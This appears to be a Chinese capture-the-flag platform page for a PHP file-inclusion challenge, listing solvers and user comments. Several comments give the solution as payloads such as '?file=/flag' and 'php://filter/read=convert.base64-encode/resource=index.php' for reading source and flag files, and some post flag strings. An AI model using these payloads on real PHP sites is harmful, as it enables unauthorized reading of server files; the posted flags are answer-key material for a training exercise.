评分(11)
解题动态

SDSZEHTZ 攻破了该题 14小时前

1986557251 攻破了该题 21小时前

jiayouya 攻破了该题 22小时前

honglanYK 攻破了该题 1天前

pcxu 攻破了该题 1天前

蘑菇 攻破了该题 1天前

18897888104 攻破了该题 1天前

nusse 攻破了该题 1天前

hackno1 攻破了该题 2天前

yydy 攻破了该题 2天前

DBON 攻破了该题 2天前

Zzzzz11111 攻破了该题 2天前

daidai0204 攻破了该题 2天前

xymm 攻破了该题 2天前

ktrktr 攻破了该题 3天前

3344 攻破了该题 3天前

WoLike 攻破了该题 3天前

13457991023 攻破了该题 3天前

2684783401 攻破了该题 3天前

评论
shingu 21天前
举报
这题过于简单了。?file=/flag。
HK1ng 3月前
举报
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
000ooo 4月前
举报
/index.php?file=/flag
哈哈哈嘿嘿嘿 1月前
举报
为什么
Zhumeng 4月前
举报
php伪协议读取index.php
Jiafeng 4月前
举报
我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php
Wang_Micro 5月前
举报
flag{642c1d8cf84d01e3a2df403e83d3e43b}
33555 5月前
举报
/index.php?file=///flag
Pearpeach1 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
hao7 6月前
举报
flag{dff1aea3fcdd906ce70c1998addf1ccc}
17795946336 6月前
举报
flag{159cf1e0d16cf846e61ae8a3ba27e912}
Z20g00d 7月前
举报
flag{38cc5dc6199822623663592b58cec109}